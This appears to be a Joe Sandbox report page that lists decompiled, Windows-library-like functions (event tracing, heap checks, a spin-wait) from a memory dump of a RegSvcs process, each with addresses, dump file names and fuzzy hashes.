			E01998A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x19bd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E018E7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0190B640(E01909AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x01998a62
0x01998a71
0x01998a79
0x01998a82
0x01998a85
0x01998a89
0x01998a8c
0x01998a8f
0x01998a92
0x01998a95
0x01998a9f
0x01998ab1
0x01998aa1
0x01998aaa
0x01998aaa
0x01998abc
0x01998abd
0x01998abf
0x01998ac4
0x01998ada

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c591c0ba9103e2abbe97d33a7484fc8827836eaaa81c20e56e457642b6b25de
Instruction ID: 792e6816d1d18485910651e209705b5d753aaaeeb8cf4287f8eb623a4386ef7f
Opcode Fuzzy Hash: 5c591c0ba9103e2abbe97d33a7484fc8827836eaaa81c20e56e457642b6b25de
Instruction Fuzzy Hash: 01012C71A0121DAFCB04DFA9D9419AEBBF8EF59310F14405AFA05E7381D634AA00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01998ED6 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E01998ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x19bd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E018E7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0190B640(E01909AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x01998ed6
0x01998ee5
0x01998eed
0x01998ef0
0x01998efa
0x01998f03
0x01998f0c
0x01998f15
0x01998f24
0x01998f27
0x01998f31
0x01998f43
0x01998f33
0x01998f3c
0x01998f3c
0x01998f4e
0x01998f4f
0x01998f51
0x01998f56
0x01998f69

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52ada316703359b55ff0c9c0103cf31ba8dffbce18612e43e925d49a74ca594f
Instruction ID: e49542057126381f032ec924782f4385d46a4308efbd3782d723f26c7e700c77
Opcode Fuzzy Hash: 52ada316703359b55ff0c9c0103cf31ba8dffbce18612e43e925d49a74ca594f
Instruction Fuzzy Hash: CE111E70A05249DFDB04DFA9D545BAEBBF4FF08300F0442AAE519EB382E6349940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 018CDB60 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018CDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E018CDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E018CE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L018CE8B0(__ecx, _t14, 0xfff);
							L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x018cdb64
0x018cdb66
0x018cdb6b
0x018cdbaa
0x018cdb71
0x018cdb76
0x018cdb7a
0x018cdba3
0x018cdb7c
0x018cdb87
0x018cdb8b
0x01924fa1
0x01924fb3
0x01924fb8
0x018cdb91
0x018cdb96
0x018cdb98
0x018cdb98
0x018cdb8b
0x018cdb7a
0x018cdb9d
0x018cdba2

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 001561804e62ae37c10fbf1c1d8c6a47b8ba6277b61fadfa6c3962053ee47cdc
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: 28F044322455269BD7327A99C884B67BAA59F91F60F150139B209DB244C970CA0296D5

Uniqueness

Uniqueness Score: -1.00%

Function 018CB1E1 Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018CB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E018E7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E018E7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E01947016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x018cb1e8
0x018cb1ea
0x018cb1f3
0x01924a17
0x018cb1f9
0x018cb1f9
0x018cb1f9
0x018cb201
0x01924a21
0x01924a2e
0x00000000
0x00000000
0x01924a3b
0x01924a4d
0x01924a3d
0x01924a46
0x01924a46
0x01924a55
0x00000000
0x00000000
0x00000000
0x018cb20a
0x018cb20a
0x018cb20a
0x018cb20a

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: 0a9c696abb156fb87bc4ffa19690f688e3c216b1ef73565e6517294d1c124d09
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: BF01F432201A84DBD322975DE808F697FD9EF92B94F0800A5FA18CB6B6D779C900C355

Uniqueness

Uniqueness Score: -1.00%

Function 0195FE87 Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0195FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x19bd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E018E7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0190B640(E01909AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0195fe96
0x0195fe9e
0x0195fea1
0x0195fead
0x0195feb3
0x0195feb9
0x0195fec3
0x0195fed5
0x0195fec5
0x0195fece
0x0195fece
0x0195fee0
0x0195fee1
0x0195fee3
0x0195fee8
0x0195fefb

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60dbbd28ad106e01d55176309fcf655b252708af0df0983298999015fac7d8ba
Instruction ID: 161d34666bab194bef9c2502c8327ef329726f0584b0f9a1efbd0ec797e573e4
Opcode Fuzzy Hash: 60dbbd28ad106e01d55176309fcf655b252708af0df0983298999015fac7d8ba
Instruction Fuzzy Hash: DE018670A0420DEFCB14DFA8D546A6EB7F4FF04714F144169B909EB382D635EA01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 018F6B90 Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E018F6B90(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _t11;
				signed int _t12;
				intOrPtr _t19;
				void* _t20;
				intOrPtr* _t21;

				_t21 = _a4;
				_t19 =  *_t21;
				if(_t19 != 0) {
					if(_t19 < 0x1fff) {
						_t19 = _t19 + _t19;
					}
					L3:
					 *_t21 = _t19;
					asm("rdtsc");
					_v8 = 0;
					_t12 = _t11 & _t19 - 0x00000001;
					_t20 = _t19 + _t12;
					if(_t20 == 0) {
						L5:
						return _t12;
					} else {
						goto L4;
					}
					do {
						L4:
						asm("pause");
						_t12 = _v8 + 1;
						_v8 = _t12;
					} while (_t12 < _t20);
					goto L5;
				}
				_t12 =  *( *[fs:0x18] + 0x30);
				if( *((intOrPtr*)(_t12 + 0x64)) == 1) {
					goto L5;
				}
				_t19 = 0x40;
				goto L3;
			}

0x018f6b96
0x018f6b99
0x018f6b9d
0x018f6be9
0x018f6beb
0x018f6beb
0x018f6bb3
0x018f6bb3
0x018f6bb5
0x018f6bba
0x018f6bc1
0x018f6bc3
0x018f6bc5
0x018f6be0
0x018f6be0
0x00000000
0x00000000
0x00000000
0x018f6bc7
0x018f6bc7
0x018f6bd0
0x018f6bd5
0x018f6bd6
0x018f6bd9
0x00000000
0x018f6bc7
0x018f6ba5
0x018f6bac
0x00000000
0x00000000
0x018f6bae
0x00000000

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81643371c3d383621713f4ac5897031efe5d79de90dbf9db909a2b6cb50fdbef
Instruction ID: 79f4b51fed3f65397cb11053f67729dbaa01c0cbb96a50d8d41bf285e6a2f173
Opcode Fuzzy Hash: 81643371c3d383621713f4ac5897031efe5d79de90dbf9db909a2b6cb50fdbef
Instruction Fuzzy Hash: 33F04975A0020CDFDB18CE48C690AACBBB1FB44310F2846ACE606DB700E6399F00DB40

Uniqueness

Uniqueness Score: -1.00%

Function 0198131B Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0198131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x19bd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E018E7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0190B640(E01909AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x0198131b
0x0198132a
0x01981330
0x01981336
0x0198133e
0x01981341
0x01981344
0x0198134f
0x01981361
0x01981351
0x0198135a
0x0198135a
0x0198136c
0x0198136d
0x0198136f
0x01981374
0x01981387

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c790a60e38167746bbae68cb394909c69f022ab38f4c3cd8c8edc136eadb7c60
Instruction ID: fdb332c0110502c5c2389b7760cce030b2fb55750360eed1516fd1063d66c857
Opcode Fuzzy Hash: c790a60e38167746bbae68cb394909c69f022ab38f4c3cd8c8edc136eadb7c60
Instruction Fuzzy Hash: F9013C71A0524DAFCB04EFE9D545AAEB7F4FF58700F00406AB909EB381E6749A00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 01998F6A Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E01998F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x19bd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E018E7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0190B640(E01909AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x01998f6a
0x01998f79
0x01998f81
0x01998f84
0x01998f8b
0x01998f91
0x01998f94
0x01998f9e
0x01998fb0
0x01998fa0
0x01998fa9
0x01998fa9
0x01998fbb
0x01998fbc
0x01998fbe
0x01998fc3
0x01998fd6

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72f8514b758a61e97825a37962e7ae45eeb807097c9713a01c3c864abb36f930
Instruction ID: ae57d0a3aeffa2aa17874460489b168836a58303774b201d62aa72b9f24311c6
Opcode Fuzzy Hash: 72f8514b758a61e97825a37962e7ae45eeb807097c9713a01c3c864abb36f930
Instruction Fuzzy Hash: F8014475A0520DEFDB04DFA8D545AAEBBF4EF58300F104459B909EB381DA74DA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 01981608 Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E01981608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x19bd360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E018E7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0190B640(E01909AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x01981608
0x01981617
0x0198161d
0x01981625
0x01981628
0x0198162b
0x01981636
0x01981648
0x01981638
0x01981641
0x01981641
0x01981653
0x01981654
0x01981656
0x0198165b
0x0198166e

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 835427da65561c3dfa23bfb421487f30de555ef747e976309cb08b53bd6740d7
Instruction ID: 31d9be0a3fb22c3c4e48515b77dd84095fce8b519bebbfa90b2a8a0389207a80
Opcode Fuzzy Hash: 835427da65561c3dfa23bfb421487f30de555ef747e976309cb08b53bd6740d7
Instruction Fuzzy Hash: 7AF06271A05248EFDB14EFE8D545E6EB7F4EF54304F044069A909EB381E6349900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 018EC577 Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018EC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E018EC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x18a11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E019988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x018ec577
0x018ec57d
0x018ec581
0x018ec5b5
0x018ec5b9
0x018ec5ce
0x018ec5ce
0x018ec5ca
0x00000000
0x018ec5ca
0x018ec5c4
0x018ec5c8
0x00000000
0x00000000
0x00000000
0x018ec5ad
0x00000000
0x018ec5af

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94f27d64eefeca89e41d7b3201fa1e285760f713a95ae61f93390477bb60f100
Instruction ID: d301b306314b53585e972a216ffaacd5ed9986f4cb52c1fea22d7a6cdc28cda1
Opcode Fuzzy Hash: 94f27d64eefeca89e41d7b3201fa1e285760f713a95ae61f93390477bb60f100
Instruction Fuzzy Hash: 0BF09AB2D15694AFE7368B2C800CB227FE8BB07774F54846AF51AC7202C7A4DA80C251

Uniqueness

Uniqueness Score: -1.00%

Function 01982073 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E01982073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0197FD22(__ecx);
				_t19 =  *0x19b849c - _t3; // 0x7a267b94
				if(_t19 == 0) {
					__eflags = _t17 -  *0x19b8748; // 0x0
					if(__eflags <= 0) {
						E01981C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x19b8724 & 0x00000004;
							if(( *0x19b8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x19b8724; // 0x0
					return E01978DF1(__ebx, 0xc0000374, 0x19b5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x01982076
0x01982078
0x0198207d
0x01982083
0x019820a4
0x019820aa
0x019820ac
0x019820b7
0x019820ba
0x019820bc
0x019820c9
0x019820c9
0x019820d0
0x019820d2
0x00000000
0x019820d2
0x019820be
0x019820c3
0x019820c5
0x019820c7
0x00000000
0x00000000
0x019820c7
0x019820bc
0x019820d4
0x01982085
0x01982085
0x019820a3
0x019820a3

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d18ecbdd547f7ed30a4de401ad031da0a91cd0ffe11fb1fb8e7e90947d3b8c4d
Instruction ID: d04727e0239a346ec0b319b93422da8a47f806d672f15fe29a06d8b7510db5ca
Opcode Fuzzy Hash: d18ecbdd547f7ed30a4de401ad031da0a91cd0ffe11fb1fb8e7e90947d3b8c4d
Instruction Fuzzy Hash: 57F0E53A81A2854AEF33BF6C76853E27FDEDB9A115F1E1485D5A857209C5388893CB20

Uniqueness

Uniqueness Score: -1.00%

Function 0190927A Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0190927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L018E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0190FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E019092C6(_t11, _t14);
				}
				return _t11;
			}

0x01909295
0x01909299
0x0190929f
0x019092aa
0x019092ad
0x019092ae
0x019092af
0x019092b0
0x019092b4
0x019092bb
0x019092bb
0x019092c5

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: a6706b920da3640ac601b9e134a71d6b2333332da508541275446bea35214eec
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: D5E02B723405016FE7229E0DCC84F03379DDFD2725F004078B5085E283C6E5DD0887A0

Uniqueness

Uniqueness Score: -1.00%

Function 01998D34 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E01998D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x19bd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E018E7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0190B640(E01909AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x01998d34
0x01998d43
0x01998d4b
0x01998d4e
0x01998d52
0x01998d5c
0x01998d6e
0x01998d5e
0x01998d67
0x01998d67
0x01998d79
0x01998d7a
0x01998d7c
0x01998d81
0x01998d94

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abb16a5246fab87d73ee1cafffed6d68709a3dc45d2217c06acdc08cdd8a2535
Instruction ID: cb66f78900d4d4eff328df9d0a9ade49c48aecc4f8ea59d0773f7c3d43b2e2f7
Opcode Fuzzy Hash: abb16a5246fab87d73ee1cafffed6d68709a3dc45d2217c06acdc08cdd8a2535
Instruction Fuzzy Hash: 96F0B470A0460C9FDB14EFB8D545A6E77B8EF54300F108099E909EB281DA34D900C754

Uniqueness

Uniqueness Score: -1.00%

Function 01998B58 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E01998B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x19bd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E018E7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0190B640(E01909AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x01998b67
0x01998b6f
0x01998b72
0x01998b7d
0x01998b8f
0x01998b7f
0x01998b88
0x01998b88
0x01998b9a
0x01998b9b
0x01998b9d
0x01998ba2
0x01998bb5

Memory Dump Source

